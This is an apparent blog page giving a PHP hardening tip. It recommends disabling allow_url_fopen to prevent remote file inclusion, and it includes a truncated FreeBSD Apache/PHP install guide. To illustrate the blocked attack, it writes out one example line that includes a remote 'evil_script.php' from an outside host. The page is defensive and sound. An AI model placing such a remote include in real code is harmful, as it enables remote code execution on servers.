PHP Security Tips – Securing PHP by hardening PHP configuration
When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.
In this article I will discuss how to secure PHP by hardening PHP 5 configuration.
1. allow_url_fopen ( enabled by default )
This directive allows PHP's file functions ( file_get_contents, include and require statements ) to retrieve data from remote locations, like FTP or HTTP.
If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. The vulnerability is called Remote file inclusion or RFI.
; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off
The setting can also be applied in apache's httpd.conf :
# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off
It prevents URLs from being used in PHP. A command like include ("http://www.example.com/evil_script.php") will not be allowed to execute. Only files that reside within your site can be included: include("/var/www/html/config.inc.php").
Print This Post
Apache HTTP Server + PHP 5 + MySQL Installation in FreeBSD
1. Install Apache HTTP Server
Go to apache22 port:
# cd /usr/ports/www/apache22
and type:
# make config
Now you can choose the options from the menu.
# make install clean
To enable apache on boot, add the following line to /etc/rc.conf
apache22_enable="YES"
To start apache http server, type
# /usr/local/etc/rc.d/apache22 start
2. Install PHP 5
Go to php port:
# cd /usr/ports/lang/php5
and type:
Print This Post
Subscribe
Calendar
| M | T | W | T | F | S | S |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
| 29 | 30 | |||||
Polls
Loading ...Quote of the day
- Muhammad Ali -
Recent Posts
- Ubuntu: How to install the Classic Desktop in Ubuntu 11.10 (Oneiric Ocelot)
- FreeBSD: How to set up an UPnP Internet Gateway Device (IGD) with MiniUPnP and FreeBSD 9.0
- Ubuntu: How to build and install Linksys AE1000 Wireless-N linux driver on Ubuntu 11.10
- FreeBSD: How to Install and Configure a PPTP VPN server with mpd5 on FreeBSD 8.2
- UNIX Tips: How to find broken symbolic links
Recent Comments
- on FreeBSD: How To Upgrade FreeBSD 7 to 8 Stable Release
- on FreeBSD: How to Install Adobe Flash in FreeBSD 8
- on How To Reset Keyring Password in Ubuntu
- on Ubuntu: How to build and install Linksys AE1000 Wireless-N linux driver on Ubuntu 11.10
- on FreeBSD: How to set up an UPnP Internet Gateway Device (IGD) with MiniUPnP and FreeBSD 9.0
Blogs
Links
Archives
- March 2012 (1)
- February 2012 (1)
- January 2012 (1)
- December 2011 (1)
- November 2011 (4)
- October 2011 (1)
- September 2011 (1)
- August 2011 (1)
- July 2011 (3)
- June 2011 (1)
- May 2011 (1)
- December 2010 (1)
- November 2010 (1)
- October 2010 (4)
- September 2010 (4)
- August 2010 (5)
- July 2010 (3)
- June 2010 (9)
- May 2010 (13)
- April 2010 (23)
- March 2010 (18)
- February 2010 (6)